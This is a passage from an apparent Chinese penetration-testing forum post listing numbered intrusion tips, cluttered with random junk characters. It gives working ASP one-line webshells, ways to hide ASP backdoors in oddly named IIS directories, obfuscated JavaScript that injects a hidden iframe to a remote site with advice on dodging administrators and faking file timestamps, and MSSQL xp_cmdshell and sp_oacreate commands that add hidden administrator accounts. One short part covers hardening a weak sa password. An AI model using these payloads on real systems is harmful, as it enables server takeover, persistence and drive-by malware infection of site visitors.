e).<%25Execute(request("l"))%25>& s) r2 \0 s2 j6 ~6 m
f).<%if request("cmd")<>"" then execute request("pass")%>  q8 a/ d; W& T0 [! h# ]
, i: k) f9 Z; p
52、at "12:17" /interactive cmd; O; V6 c* S1 [' ?0 S
执行后可以用AT命令查看新加的任务9 e0 a2 k" P3 ]8 g
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
8 z2 l: W: u: @1 T5 H( D$ ^0 V# ^7 W) @# E0 L
53、隐藏ASP后门的两种方法
" b% q- Y% B6 F: q7 Q$ \& M1、建立非标准目录:mkdir images..\
3 e9 ]) w& b) u3 K" Z9 r拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp0 B8 q0 L* j) x! Y
通过web访问ASP木马:http://ip/images../news.asp?action=login4 A9 c( J( L  h  O
如何删除非标准目录:rmdir images..\ /s; \" W8 I  S  M! V. o
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
( |/ g6 T1 f1 @mkdir programme.asp
9 ]6 s  a+ ~# Q; ~+ V新建1.txt文件内容:<!--#include file=”12.jpg”--># K! R  q: F1 E2 a  k0 F
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件) t7 F, F6 ?6 {) d, ]
attrib +H +S programme.asp, |: Z* {) Q, Z
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
* ~3 U/ ?; Y* F. J7 u" C8 y" i- [6 C$ N# f& c( V
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
  S. B* G* A) f2 a' q然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
7 ?- |, o( W+ D/ A; o; Y: ]: R$ Q# o7 s
55、JS隐蔽挂马9 e4 G: T9 S- [
1.
4 F: {8 l3 s$ Ivar tr4c3="<iframe src=ht";
# R% a! l. G+ A$ }tr4c3 = tr4c3+"tp:/";
# V7 q' ~- V' R: ^* rtr4c3 = tr4c3+"/ww";& l- z2 u8 Z' [& G4 g
tr4c3 = tr4c3+"w.tr4";
! J) A( u- s1 V' M- s1 K+ `, ~tr4c3 = tr4c3+"c3.com/inc/m";7 Q2 O9 o' J+ R; \& ~6 b
tr4c3 = tr4c3+"m.htm style="display:none"></i";0 h$ c- T( V+ N' `1 x8 ?; d
tr4c3 =tr4c3+"frame>'";
" T& e. N  r5 C) K+ R0 _document.write(tr4c3);
9 X2 Q) _8 O. q# ?% |' i2 h, _3 B4 w! L避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。; S- w# h" @& V) D% F

( w0 |8 R1 }  J& X& `6 ~2 k9 y2.
+ T' e1 x" l( h, \" w2 T- q- D转换进制,然后用EVAL执行。如
$ O6 D0 G8 T' z+ D: zeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
4 m( Y" W* C  p* g" d9 X" X# E不过这个有点显眼。5 a4 R/ c7 q& e/ }& L9 s
3.' K8 K- |2 g: Y! R8 }
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
/ i$ y: U  F" A) E, S最后一点,别忘了把文件的时间也修改下。6 @9 l: `8 Z7 q# p8 w! k1 g

/ `  G3 c0 P, {& A8 t56.3389终端入侵常用DOS命令$ m* z- u" [) A, u% g( N
taskkill taskkill /PID 1248 /t
6 b- T2 v( j6 {; B$ G3 l
* l; ^  d, b+ f+ G1 |2 A- qtasklist 查进程  X2 n7 q6 d* z$ n2 a
0 r" Q9 [+ N& |$ F# R; P4 j
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
( G) h: v1 h+ C  |iisreset /reboot
: d% Z. [2 a) H+ d* P. J/ y# Qtsshutdn /reboot /delay:1    重起服务器) |$ y9 L0 p- w  S

, @1 o6 w8 [$ B+ Ologoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,- Q1 g' \7 y% Z9 |8 N# X
6 u2 D+ ]  p2 R. E0 r9 G8 V
query user 查看当前终端用户在线情况& Z% c0 O; U5 g; M

$ [: n( T) g& ^! {- ?要显示有关所有会话使用的进程的信息,请键入:query process *& b$ ~) }* [( C( z7 H+ A
2 P! k# M8 v5 ]) a8 O7 C) T
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:27 K: B# m) I+ d! m

2 A4 H3 R- S, k要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2( q* C( q# M* y4 t& i: b
8 U& m( U2 u/ e! q: ~
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
1 _$ j/ s' |3 B5 B5 }1 ?4 t1 D
1 P1 @' Y2 t3 N命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启; c( V4 @: F. |/ I7 B) e0 b/ I
. k+ r% s7 T$ s) A# [
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统- o% }- A$ `3 P3 e

0 P9 j4 ~1 o# i! K; ]" w+ ]命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
; w9 P' F# m- ~9 X" R1 @
/ T/ p: H& U+ u" e0 _1 Q/ E命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机. s# K* M, V4 e3 |3 c

9 I  c! [2 L( P56、在地址栏或按Ctrl+O,输入:* `2 X8 u/ _, n/ R, B
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
! E' _- J# a' v7 m/ s: E
7 x2 B6 g- `3 m) e9 _0 f8 E% T) @源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
* t* A/ e0 Z8 n
5 h( ]  w$ ~/ [/ q2 B# M0 c, i57、net user的时候,是不能显示加$的用户,但是如果不处理的话,) v5 \. h3 R7 b' l) T
用net localgroup administrators是可以看到管理组下,加了$的用户的。
' |; z& j0 K. H# ]3 |/ U& k3 X7 _4 E. B! D2 Y, F$ N! o1 o* F
58、 sa弱口令相关命令
5 a9 g! t; M% n# S/ v! I9 Z: I$ ^
1 r$ Y4 C1 Y8 x  r一.更改sa口令方法:
+ E2 q( r3 E. s6 M用sql综合利用工具连接后,执行命令:" P3 y0 u0 D! ]
exec sp_password NULL,'20001001','sa'
& V# [5 `! K# ?% w(提示:慎用!)
4 ^" A% ~1 y  y0 J8 ]* j7 D
. y2 q/ e* x$ ^- y# N, Y二.简单修补sa弱口令.
% _# K8 U) \5 N# c% l5 S& n; M/ N: O- V. D
方法1:查询分离器连接后执行:
" d) m; ^$ v* v$ ~# F  ?if exists (select * from
5 ^3 W3 @  m  F" D% Zdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and" ~& q& I4 e4 W
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)0 ~" V0 \; ?6 ~7 e4 T

2 M# Y3 V: B5 L1 r& Kexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
5 n6 w- [" q9 g3 C) W$ g$ h7 M4 H. o; ?( E
GO
# h  h0 O6 I! d
% }# W7 r) H% O0 y% c然后按F5键命令执行完毕
) k" V7 V1 H1 y+ {
  B( A: j  e) c# ]* Z1 R方法2:查询分离器连接后
9 l" q- N& x  L" W9 }第一步执行:use master
( u4 S' m) _: T5 h' b第二步执行:sp_dropextendedproc 'xp_cmdshell'6 W8 c) }9 L+ b' R9 T; P7 z
然后按F5键命令执行完毕
% L# K9 |1 K$ m8 ~* H/ n
' U8 W* `" p: M& S! N; Y2 c. [! G/ u4 E; ^) M! Y. T' l* b
三.常见情况恢复执行xp_cmdshell.9 @# A8 G; u9 F" `4 h& Z

: ]# B' C# w$ q* \% o
, K2 b) Z, n0 w$ a* Y. n1 未能找到存储过程'master..xpcmdshell'.
2 j" _3 M( Z% S   恢复方法:查询分离器连接后,
  W: k. G3 F7 F; ]1 Q; o3 L- G第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
+ D) |+ q0 N0 ~6 |第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'2 W& g8 [8 Q: N! l
然后按F5键命令执行完毕
  }6 j3 @4 F5 e1 j2 m' N7 ~$ z: q% Q  a# R+ _
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
0 o. m& l- m( x! |恢复方法:查询分离器连接后,  o0 M6 n7 w. a) h" ?4 y- Z3 a
第一步执行:sp_dropextendedproc "xp_cmdshell"0 w, F# {5 S2 H; A. x, N
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( p2 M* t! B. H5 B- D然后按F5键命令执行完毕' {7 _. H# t5 Y1 d- A: g0 i
$ D6 K* z6 r. a; Q+ R
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)# B; I7 U$ z( N, b5 X% s
恢复方法:查询分离器连接后,
! }- L9 Z+ r3 @, G& X  K$ p第一步执行:exec sp_dropextendedproc 'xp_cmdshell'0 c4 e# h% t3 J9 h  o
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           5 L# r& d& S  T! g9 C
然后按F5键命令执行完毕. s" @* |/ {2 @; Q0 g/ [
* I- B# a3 I8 O7 C
四.终极方法.& _2 {' l& f# ?- {- a
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:, L) v. d4 a& |# X
查询分离器连接后,
: W' e/ w* t# n5 _: Z' U2000servser系统:' N: f2 D% s9 C7 t
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'( s5 H! l1 n' |
5 {* @& y, N' z/ u3 `8 V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'6 w# N8 R# Y' \
( R* Q  ~) g3 E3 N! e
xp或2003server系统:
4 |8 z8 K6 y# m" \+ U. J5 ~! _1 z
# [5 Q+ F( w# d6 ]( B# mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'8 E$ p2 N, c# p

: E6 G9 I  }, W9 D4 gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
4 Z# C# @- w0 M




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2